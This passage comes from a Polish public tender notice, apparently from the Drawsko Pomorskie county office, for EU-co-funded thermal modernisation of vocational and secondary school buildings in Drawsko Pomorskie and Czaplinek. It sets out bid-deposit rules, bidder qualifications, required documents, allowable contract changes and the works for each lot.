1)Zamawiający zwróci niezwłocznie wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza.
2)Zamawiający zwraca niezwłocznie wadium, na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
3)Jeśli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
4)Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca  w odpowiedzi na wezwanie nie złożył dokumentów lub oświadczeń, chyba że udowodni że wynika to z przyczyn nieleżących po jego stronie.
5)Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
a)Odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
b)Nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
c)Zawarcie umowy w sprawie zamówienia stało się niemożliwe z przyczyn leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać się wykonaniem w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, co najmniej dwóch robót budowlanych, polegających na termomodernizacji budynku o wartości nie mniejszej niż 500 000,00 zł każda, z podaniem jej wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że zamówienie to zostało wykonane zgodnie ze sztuką budowlaną
Zamawiający  oceni  spełnianie  powyższego  warunku  w  oparciu  o  formułę spełnia  -  nie spełnia poprzez analizę wymaganych dokumentów i oświadczeń.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi dysponować  osobami  posiadającymi  aktualne uprawnienia  budowlane  do  kierowania  robotami budowlanymi lub  przedstawić  pisemne zobowiązanie  innych  podmiotów  do  udostępnienia osób posiadających niżej wymienione uprawnienia. 

Kierownik budowy - uprawnienia budowlane w specjalności konstrukcyjno -budowlanej bez ograniczeń,aktualny wpis do Izby Inżynierów Budownictwa, minimum 3-letnie doświadczenie w kierowaniu lub nadzorowaniu robót budowlanych
Kierownik robót sanitarnych - uprawnienia budowlane z zakresu branży sanitarnej,aktualny wpis do Izby Inżynierów Budownictwa,minimum 3-letnie doświadczenie w kierowaniu lub nadzorowaniu robót instalacyjnych

Uprawnienia budowlane odpowiadające powyższym uprawnieniom, a nadane na podstawie wcześniej  obowiązujących  przepisów będą traktowane na równi z uprawnieniami określonymi w warunku. 
Zamawiający  oceni  spełnianie  powyższego  warunku  w  oparciu  o  formułę spełnia  -  nie spełnia poprzez analizę wymaganych dokumentów i oświadczeń.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi posiadać  opłaconą polisę,  a w  przypadku  jej  braku  inny dokument  potwierdzający, że wykonawca jest  ubezpieczony  od  odpowiedzialności  cywilnej  w  zakresie  prowadzonej  działalności gospodarczej na sumę nie mniejszą niż 1.000.000,00 zł. 
Zamawiający  oceni  spełnianie  powyższego  warunku  w  oparciu  o  formułę spełnia  -  nie spełnia poprzez analizę wymaganych dokumentów i oświadczeń.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wzór umowy zawarty został w Załączniku nr 11do SIWZ.
Zamawiający zgodnie z art. 144 ustawy Prawo zamówień publicznych przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem  podawanych warunków ich wprowadzenia.  

1.zmiana okresu przewidzianego na ukończenie robót   

1)zmiany spowodowane warunkami atmosferycznymi w szczególności:
a)klęski żywiołowe;
b)warunki atmosferyczne odbiegające od typowych, uniemożliwiające prowadzenie robót budowlanych, przeprowadzanie prób i sprawdzeń, dokonywanie odbiorów;
2)zmiany spowodowane nieprzewidzianymi w SIWZ warunkami geologicznymi, archeologicznymi lub terenowymi, w szczególności: niewypały i niewybuchy; wykopaliska archeologiczne;
3)odmienne od przyjętych w dokumentacji projektowej warunki geologiczne;
4)odmienne od przyjętych w dokumentacji projektowej warunki terenowe, 
w szczególności istnienie niezinwentaryzowanych lub błędnie zinwentaryzowanych obiektów budowlanych;
5)zmiany będące następstwem okoliczności leżących po stronie Zamawiającego, w szczególności:
a)wstrzymanie robót przez Zamawiającego;
b)konieczność usunięcia błędów lub wprowadzenia zmian w  dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót;
c) zmiany będące następstwem działania organów administracji i innych podmiotów o kompetencjach zbliżonych do organów administracji w szczególności eksploatatorów infrastruktury oraz właścicieli gruntów pod inwestycję, 
w szczególności:
- przekroczenie zakreślonych przez prawo lub regulaminy, a jeśli takich regulacji nie ma - typowych w danych okolicznościach, terminów wydawania przez organy administracji lub inne podmioty decyzji, zezwoleń, uzgodnień itp.;
- odmowa wydania przez organy administracji lub inne podmioty wymaganych decyzji, zezwoleń, uzgodnień z przyczyn niezawinionych przez wykonawcę, 
w tym odmowa udostępnienia przez właścicieli nieruchomości do celów realizacji inwestycji;
6)  inne przyczyny zewnętrzne niezależne od Zamawiającego oraz Wykonawcy  skutkujące niemożliwością prowadzenia prac lub wykonywania innych czynności przewidzianych Kontraktem, w szczególności na skutek zlecenia Wykonawcy zamówień dodatkowych zgodnie z przepisami odrębnymi; 

W przypadku wystąpienia którejkolwiek z okoliczności wymienionych wyżej, termin okresu przewidzianego na ukończenie robót może ulec odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia wykonywania jej przedmiotu w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności.  

2.Zmiana sposobu spełnienia świadczenia na skutek zmian technologicznych spowodowanych w szczególności następującymi okolicznościami:

1)niedostępność na rynku materiałów lub urządzeń wskazanych w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót spowodowana zaprzestaniem produkcji lub wycofaniem z rynku tych materiałów lub urządzeń;
2)pojawienie się na rynku materiałów lub urządzeń nowszej generacji pozwalających na zaoszczędzenie kosztów realizacji przedmiotu umowy lub kosztów eksploatacji wykonanego przedmiotu umowy, lub umożliwiające uzyskanie lepszej jakości robót;
3)pojawienie się nowszej technologii wykonania zaprojektowanych robót pozwalającej na zaoszczędzenie czasu realizacji inwestycji lub kosztów wykonywanych prac, jak również kosztów eksploatacji wykonanego przedmiotu umowy;
4)konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych/technologicznych niż wskazane w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót, w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem przedmiotu umowy,
5)odmienne od przyjętych w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót warunki geologiczne skutkujące niemożliwością zrealizowania przedmiotu umowy przy dotychczasowych założeniach technologicznych;
6)odmienne od przyjętych w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót warunki terenowe, w szczególności istnienie niezinwentaryzowanych lub błędnie zinwentaryzowanych obiektów budowlanych;
7)konieczność zrealizowania przedmiotu umowy przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego prawa;
8) konieczność usunięcia sprzeczności w dokumentacji w przypadku niemożności usunięcia sprzeczności przy pomocy wykładni, w szczególności gdy sprzeczne zapisy mają równy stopień pierwszeństwa 
W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w pkt 2 możliwa jest w szczególności zmiana sposobu wykonania, materiałów i technologii robót, jak również zmiany lokalizacji budowanych urządzeń. 

Pozostałe rodzaje zmian spowodowane następującymi okolicznościami:

1)zmiana osób, przy pomocy których Wykonawca realizuje przedmiot umowy na inne spełniające warunki określone w SIWZ, według polityki kadrowej Wykonawcy;
2)zmiana osób podanych w ofercie wykonawcy przy pomocy których Wykonawca realizuje przedmiot umowy nie wymaga aneksu do umowy (zmiana jest możliwa na osoby spełniające wymogi SIWZ, a dla skutecznej zmiany niezbędne jest uzyskanie zgody Zamawiającego na zaproponowaną osobę);
3)siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SIWZ;
4)zmiana obowiązującej stawki VAT;
5)zmiana sposobu rozliczania umowy lub dokonywania płatności na rzecz Wykonawcy na skutek zmian zawartej przez Zamawiającego umowy 
o dofinansowanie projektu lub wytycznych dotyczących realizacji projektu;
6)rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy;
7)kolizja z planowanymi lub równolegle prowadzonymi przez inne podmioty inwestycjami (W takim przypadku zmiany w umowie zostaną ograniczone do zmian koniecznych powodujących uniknięcie lub usunięcie kolizji.);
8)zmiany uzasadnione okolicznościami, o których mowa w art. 3571 §1 Kodeksu cywilnego;
9)gdy zaistnieje inna okoliczność prawna, ekonomiczna lub techniczna, skutkująca niemożliwością wykonania lub należytego wykonania umowy zgodnie z SIWZ.
W przypadku wystąpienia okoliczności wymienionych wyżej, możliwa jest 
w szczególności zmiana sposobu wykonania, materiałów i technologii robót, jak również zmiana lokalizacji budowanych urządzeń.
W przypadku określonym w pkt 4, zmiana stawki VAT dotyczyć będzie ceny kontraktowej, w części, jakiej dotyczą te zmiany przepisów.
W przypadku pkt 5, zmiany dostosują sposób rozliczeń lub płatności do wymogów zmienionej umowy o dofinansowanie projektu lub nowych wytycznych dotyczących realizacji projektu.
W przypadku pkt 6, zmiany mogą  dotyczyć zakresu wykonywanych prac, zmian dokumentacji i zmniejszenia wynagrodzenia o kwoty odpowiadające cenie robót, z których Zamawiający rezygnuje.
Zmiana wynagrodzenia Wykonawcy jest możliwa w przypadkach wskazanych wyżej, na zasadach określonych w warunkach umowy. 

Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiatdrawski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe
Pl. E. Orzeszkowej 3
78-500 Drawsko Pomorskie
pokój nr 303.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.03.2011 godzina 13:00, miejsce: Starostwo Powiatowe
Pl. E. Orzeszkowej 3
78-500 Drawsko Pomorskie
pokój nr 115 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający dopuszcza składanie ofert częściowych. Zamawiający zastrzega, iż jeden oferent może złożyć oferty maksymalnie na dwie części (zadania)  

Projekt współfinansowany w ramach działania 9.3 - Termomodernizacja obiektów użyteczności publicznej,
 priorytetu IX Infrastruktura energetyczna przyjazna środowisku i efektywność energetyczna,
Programu Operacyjnego Infrastruktura i Środowisko 2007-2013
umowa o dofinansowanie nr POIS.09.03.00-00-017/09-00.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ZADANIE NR 1: Termomodernizacja: 
a)budynku warsztatów Zespołu Szkół Zawodowych w Drawsku Pomorskim,
b)budynku spawalni Zespołu Szkół Zawodowych w Drawsku Pomorskim,
c)budynku Zespołu Szkół Zawodowych w Drawsku Pomorskim.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres dla budynku warsztatów
1Ocieplenie stropodachu pełnego wełną granulowaną wdmuchiwaną grubości 15 cm  (część dobudowana) oraz wykonanie izolacji przeciwwilgociowej papą termozgrzewalną
2. Ocieplenie stropodachu pełnego części głównej warstwą styropianu twardego w płytach   grubości 16 cm oraz wykonanie pokrycia dachowego papą termozgrzewalną, ocieplenie  stropodachu niewentylowanego styropianem gr 15 cm na wierzchu dachu, izolacji przeciwwilgociowej papą termozgrzewalną.
3. Ocieplenie ścian zewnętrznych grubości 38 cm (dobudówka) warstwą styropianu o grubości 13 cm
4. Wymiana drewnianej, stalowej stolarki okiennej drzwi zewnętrznych i bram na stolarkę jak w projekcie budowlanym.
5. Modernizacja instalacji centralnego ogrzewania polegająca na zastosowaniu grzejników stalowych, płytowych z zaworami termostatycznymi, rurociągami miedzianymi

Zakres dla budynku spawalni
1. Ocieplenie stropodachu pełnego warstwą styropianu twardego w płytach grubości 16 cm  laminowanego oraz wykonanie pokrycia dachowego papą termozgrzewalną, 
2. Ocieplenie ścian zewnętrznych grubości 38 cm warstwą styropianu o grubości 13 cm
3. Wymiana stolarki okiennej drzwi zewnętrznych i bram jak w projekcie budowlanym z zastosowaniem nowej stolarki energooszczędnej.
4. Modernizacja instalacji centralnego ogrzewania polegająca na wymianie istniejących grzejników na stalowe, płytowe z zaworami termostatycznymi i rurociągami miedzianymi, połączyć w całość i pozostawić istniejącą instalację miedzianą i grzejniki płytowe w pomieszczeniu stacji diagnostycznej
Zakres dla budynku szkoły
1. Ocieplenie stropodachu wentylowanego wełną granulowaną wdmuchiwaną grubości 14  cm (część dobudowana) oraz wykonanie izolacji przeciwwilgociowej papą termozgrzewalną
2. Ocieplenie stropodachu niewentylowanego zaplecza sali sportowej warstwą styropianu  twardego grubości 15 cm oraz wykonanie pokrycia dachowego papą termozgrzewalną,
3. Ocieplenie stropu pod nieogrzewanym poddaszem w części starej warstwą wełny mineralnej w płytach grubości 16 cm oraz wykonanie pokrycia dachowego papą termozgrzewalną
4. Ocieplenie ścian zewnętrznych grubości 38 cm sali sportowej warstwą styropianu o grubości 13 cm
5. Ocieplenie ścian zewnętrznych z gazobetonu dobudowanej części dydaktycznej szkoły warstwą styropianu grubości 12 cm metodą bezspoinową.
6. Wymiana drewnianej i stalowej stolarki okiennej na stolarkę z tworzyw sztucznych z zastosowaniem nawiewników automatycznych montażem nowych parapetów.
7. Zamurowanie luksferów w sali sportowej.
8. Modernizacja instalacji centralnego ogrzewania polegająca na zastosowaniu grzejników stalowych, płytowych z zaworami termostatycznymi, rurociągami miedzianymi, połączyć w całość i pozostawić istniejącą instalację miedzianą i grzejniki płytowe
W ofercie należy uwzględnić konieczność wykonania robót na czynnym obiekcie. 
Prace budowlane muszą być prowadzone w sposób nieutrudniający normalnego funkcjonowania placówki. 
Wykonawca jest zobowiązany sporządzić harmonogram robót stanowiący załącznik nr 1 do umowy najpóźniej do dnia podpisania umowy (harmonogram musi być zaakceptowany przez Zamawiającego).
Zamawiający zaleca dokonanie wizji obiektu, którego dotyczy niniejsze postępowanie. 
Przedmiar robót stanowi jedynie element pomocniczy przy sporządzeniu oferty, wycenę należy poprzedzić własnymi pomiarami. Ofertę należy sporządzić z uwzględnieniem kosztów zakupu materiałów i pracy sprzętu. 
Szczegółowy opis zakresu prac oraz technologia wykonania robót, a także zakres określone zostały w załączonych do SIWZ projekcie budowlanym, wykonawczym i specyfikacji technicznej wykonania i odbioru robót budowlanych a także przedmiarze robót (pomocniczo) stanowiących załącznik nr 1 do SIWZ. Oferta ma być kompletna z uwzględnieniem wszystkich branż a także powinna uwzględniać wszystkie czynności i koszty wynikające z projektu budowlanego (przygotowanie terenu, niezbędne roboty rozbiórkowe elementów po dawnych obiektach itp.)
Uwaga: wszystkie użyte znaki towarowe, patenty, nazwy własne, pochodzenie (np. atlas, sigenia, ceresit) użyte w dokumentacji projektowej, należy rozumieć jako przykładowe, tzn. że możliwe jest zastosowanie materiałów budowlanych, urządzeń, rozwiązań technologicznych itp. - innych, pod warunkiem, że będą one co najmniej równoważne..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.32.10.00-3, 45.23.10.00-4, 45.33.11.00-7, 45.42.10.00-4, 45.31.23.10-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ZADANIE NR 2: Termomodernizacja:
a)budynku Zespołu Szkól Ponadgimnazjalnych w Czaplinku przy ul. Parkowej 
b)budynku Zespołu Szkól Ponadgimnazjalnych w Czaplinku przy ul. Grunwaldzkiej
c)budynku Zespołu Szkól Ponadgimnazjalnych w Czaplinku przy ul. Wałeckiej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres dla budynku przy ul Parkowej 
1. Ocieplenie stropodachu pełnego łącznika i dobudowanej części dydaktycznej warstwą styropianu grubości 15 cm oraz wykonanie pokrycia dachowego papą termozgrzewalną,
2. Ocieplenie ścian warstwą styropianu wg projektu budowlanego budynek szkoły gr. 14 cm, łącznik i dobudowana część dydaktyczna gr. 13 cm
3. Ocieplenie stropu części nieogrzewanej poddasza szkoły warstwą wełny mineralnej  grubości 16 cm z wykonaniem ciągów komunikacyjnych
4. Wymiana stolarki okiennej na stolarkę z tworzyw sztucznych z zastosowaniem nawiewników automatycznych (łącznik i stołówka oraz pozostałe niewymienione okna budynku internatu)
5. Modernizacja instalacji centralnego ogrzewania polegająca na zastosowaniu grzejników stalowych, płytowych z zaworami termostatycznymi, rurociągami z tworzyw sztucznych, automatyką pogodową
6. Modernizacja kotłowni polegająca na wymianie urządzeń istniejącej kotłowni na jeden  kocioł gazowy o mocy 120 kW z regulatorem pogodowym, sterującym obiegiem grzewczym, czterema obiegami grzewczymi c.o. oraz jednym obiegiem ciepłej wody użytkowej. Zasilanie instalacji c.w.u. zasobnika o pojemności 700 litrów.  

Zakres dla budynku przy ul Grunwaldzkiej 
1 Ocieplenie stropodachu wentylowanego wełną granulowaną wdmuchiwaną grubości 14 cm (łącznik) oraz wykonanie pokrycia dachowego papą termozgrzewalną
2. Ocieplenie stropodachu pełnego zaplecza sali gimnastycznej warstwą styropianu grubości 15 cm oraz wykonanie pokrycia dachowego papą termozgrzewalną,
3. Ocieplenie ścian łącznika warstwą styropianu EPS-70 grubości 14 cm wg projektu budowlanego
4. Ocieplenie stropu części nieogrzewanej budynku głównego warstwą wełny mineralnej grubości 16 cm.
5. Wymiana stolarki okiennej na stolarkę z tworzyw sztucznych z zastosowaniem nawiewników automatycznych (szkoła - tylko niewymienione okna), łącznik i sala  gimnastyczna)
6. Modernizacja instalacji centralnego ogrzewania polegająca na zastosowaniu grzejników stalowych, płytowych z zaworami termostatycznymi, rurociągami z tworzyw sztucznych, automatyką pogodową
7. Modernizacja kotłowni polegająca na wymianie urządzeń istniejącej kotłowni na jeden nowoczesny kocioł gazowy o mocy 120 kW z regulatorem pogodowym, sterującym obiegiem grzewczym, czterema obiegami grzewczymi c.o. oraz jednym obiegiem ciepłej wody użytkowej. Zasilanie instalacji c.w.u. zasobnika o pojemności 500 litrów. 
Zakres dla budynku przy ul Wałeckiej
1. Ocieplenie ścian zewnętrznych metodą bezspoinową grubości 14 cm warstwą styropianu zgodnie z  projektem budowlanym
2.Ocieplenie stropodachu pełnego 17 cm warstwą styropianu i wykonanie izolacji przeciwwilgociowej papa termozgrzewalną. 
3.Wymiana stolarki okiennej, drzwiowej i bram garażowych jak w projekcie budowlanym  z zastosowaniem nowej stolarki energooszczędnej z nawiewnikami
4. Likwidacja wskazanych w projekcie naświetli z uzupełnieniem otworów płytami  żelbetonowymi.
5. Modernizacja instalacji c.o. obejmująca kompleksową wymianę instalacji c.o. na hermetyczną o małej pojemności wodnej, wyposażonej w zawory termostatyczne i zawory podpionowe zgodnie z dokumentacją techniczną, połączyć w całość starą instalację z nowoprojektowaną.
W ofercie należy uwzględnić konieczność wykonania robót na czynnym obiekcie. 
Prace budowlane muszą być prowadzone w sposób nieutrudniający normalnego funkcjonowania placówki. 
Wykonawca jest zobowiązany sporządzić harmonogram robót stanowiący załącznik nr 1 do umowy najpóźniej do dnia podpisania umowy (harmonogram musi być zaakceptowany przez Zamawiającego). 
Zamawiający zaleca dokonanie wizji obiektu, którego dotyczy niniejsze postępowanie. 
Przedmiar robót stanowi jedynie element pomocniczy przy sporządzeniu oferty, wycenę należy poprzedzić własnymi pomiarami. Ofertę należy sporządzić z uwzględnieniem kosztów zakupu materiałów i pracy sprzętu. 
Szczegółowy opis zakresu prac oraz technologia wykonania robót, a także zakres określone zostały w załączonych do SIWZ projekcie budowlanym, wykonawczym i specyfikacji technicznej wykonania i odbioru robót budowlanych a także przedmiarze robót (pomocniczo) stanowiących załącznik nr 2 do SIWZ. Oferta ma być kompletna z uwzględnieniem wszystkich branż a także powinna uwzględniać wszystkie czynności i koszty wynikające z projektu budowlanego (przygotowanie terenu, niezbędne roboty rozbiórkowe elementów po dawnych obiektach itp.)
Uwaga: wszystkie użyte znaki towarowe, patenty, nazwy własne, pochodzenie (np. atlas, sigenia, ceresit) użyte w dokumentacji projektowej, należy rozumieć jako przykładowe, tzn. że możliwe jest zastosowanie materiałów budowlanych, urządzeń, rozwiązań technologicznych itp. - innych, pod warunkiem, że będą one co najmniej równoważne.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.32.10.00-3, 45.23.10.00-4, 45.33.11.00-7, 45.42.10.00-4, 45.31.23.10-3.</p></li>
